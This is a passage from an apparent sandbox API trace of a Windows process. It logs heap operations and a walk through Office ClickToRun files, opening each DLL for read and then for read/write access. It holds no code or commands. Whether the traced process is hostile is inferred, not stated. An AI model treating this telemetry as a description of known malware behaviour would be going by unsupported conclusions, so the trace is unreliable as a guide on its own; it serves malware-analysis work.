0x4e030 [0079.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0079.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0079.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0079.262] AreFileApisANSI () returned 1 [0079.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll", lpUsedDefaultChar=0x0) returned 78 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0079.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0079.262] AreFileApisANSI () returned 1 [0079.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0079.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0079.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0079.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.263] GetFileType (hFile=0x430) returned 0x1 [0079.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.263] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.263] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.263] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.263] CloseHandle (hObject=0x430) returned 1 [0079.264] AreFileApisANSI () returned 1 [0079.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0079.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0079.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.264] GetFileType (hFile=0x430) returned 0x1 [0079.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.264] CloseHandle (hObject=0x430) returned 1 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0079.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0079.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0079.266] AreFileApisANSI () returned 1 [0079.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0079.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0079.266] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x11fdc400, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0xee60)) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0079.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.266] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c9565a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80c9565a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1909ea00, ftLastWriteTime.dwHighDateTime=0x1d098bf, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0079.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0079.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0079.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.267] AreFileApisANSI () returned 1 [0079.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll", lpUsedDefaultChar=0x0) returned 71 [0079.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0079.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0079.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0079.267] AreFileApisANSI () returned 1 [0079.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0079.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0079.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 71 [0079.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.267] GetFileType (hFile=0x430) returned 0x1 [0079.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0079.268] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.268] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.268] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.268] CloseHandle (hObject=0x430) returned 1 [0079.268] AreFileApisANSI () returned 1 [0079.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0079.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0079.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 71 [0079.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.268] GetLastError () returned 0x20 [0079.268] GetLastError () returned 0x20 [0079.268] SetLastError (dwErrCode=0x20) [0079.269] GetLastError () returned 0x20 [0079.269] SetLastError (dwErrCode=0x20) [0079.269] GetLastError () returned 0x20 [0079.269] SetLastError (dwErrCode=0x20) [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0079.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.269] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0079.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0079.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0079.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 